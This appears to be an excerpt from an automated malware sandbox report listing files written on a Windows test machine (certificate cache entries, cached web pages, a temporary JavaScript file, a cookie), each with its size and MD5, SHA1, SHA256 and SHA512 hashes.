  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    e341cddb8b88404d24a904f93f117f1f

    SHA1

    7a01ae678e75369b84aac8e5c31854a9fb7b4a3d

    SHA256

    113bd85fb7be9f2009cceb0ce2c49b0c55170c9c050b0f86ce068cbaa8a0b451

    SHA512

    e67894e695721432f8a5af5e687d1692426a0ffec7f7e693b2da03ad59619ba1ef331c89cecffe42b9f94ad127edaa44941c5d33b0e4635a41203ac2a2b83e16

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    c8a37cb9f68b27652a885e92298b01d5

    SHA1

    78047961d08d9818113909e59535f806416bf2ca

    SHA256

    8a48a9c311f1495d28fbd3d7ae44cffd76d096546d1825f4a7b3a267e73c4cbc

    SHA512

    e82ce96b47e24ec757c948ead8baa238688d2929dd117374db603e80b9bb7ac1e52f8d08ad991f66f122942657b1d36b20b3ad24aeb4e63edd1c99a106e4e8ef

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

    Filesize

    40KB

    MD5

    93872aeacb36cbc943a349f49e44b6ea

    SHA1

    27a994618a4664e9eb997f424e86fb0aca7681ec

    SHA256

    b1617e14dcef30f349bde4d875f0e8f246cb6da5ae0eae88f61bcba1a7a2483f

    SHA512

    cf2bd413f67e35b72efe4bd2095b7108a826c81e62bbbfb4486f4d58af00852cd109f0da935ba65c6e0f97f752a8411a69d1cf0b4914e742090609085a747dbd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

    Filesize

    6KB

    MD5

    2b872cc953ac32e1786620d2476f0171

    SHA1

    5865e7afaae9a3d975b302043357930c391ed418

    SHA256

    1c58dfd1a9264e6275594e1a75f1679e992e775c04d14025ab7d5c97f180be04

    SHA512

    ec814911fe3e569e73ae420e8b2dc1c80eae50a553bdc2d94a55465dbc4594dd68f232b20ee3c763655519c53824aaedf5161251ed43060e632df0c0fdbcaa9b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

    Filesize

    6KB

    MD5

    8eaa37246e341e29d1c3bf9562356227

    SHA1

    611439291d378bee6083cb6151f841bed7ba845e

    SHA256

    043390c30382a7f2379d354f94b94a6ecc132c2183bdd663b8bafa2c53248683

    SHA512

    640b36e2161be6faffa52913138343496d13b475616c9754c2ca74e384361ad6a8eed53d72b88e333c592512780edcf211b2069701c60486506ab56fa3870950

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

    Filesize

    6KB

    MD5

    b4fade3dc06227dc888e8e376866f45d

    SHA1

    daaea5e297cb6e71943887866c8bd200b770417e

    SHA256

    c04d858776ccb2b4581a6d1a6f142aba583a9849ee56b95fc6f4586445589263

    SHA512

    faec2c5fd2178d29c65e9a4f052949f201f110fb7a3623fb724baadedf96ef45719e73aca3f0afefdc79e511b95f4087935fb4028c0e9c3abc0a2e891582b94a

  • C:\Users\Admin\AppData\Local\Temp\Cab41F0.tmp

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\Local\Temp\Tar5A70.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fuf1304.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4BE9MGOJ.txt

    Filesize

    175B

    MD5

    84aed76d54d4c3c26528dc8792f3509e

    SHA1

    249503a0913b1b4db1ff1f58abd951321401bdd1

    SHA256

    344df8c609f293bf12df521b86b8c31b0a985524bf498e8ee71c29ddb53e434c

    SHA512

    f90a4d9840976236b39f5284e57bc52750d88530dc1a14a55219118c267c3b76a9a53cadae12db1fc40dd13a0fa224cc9affe467fd44eb918c69432bcbf6f858
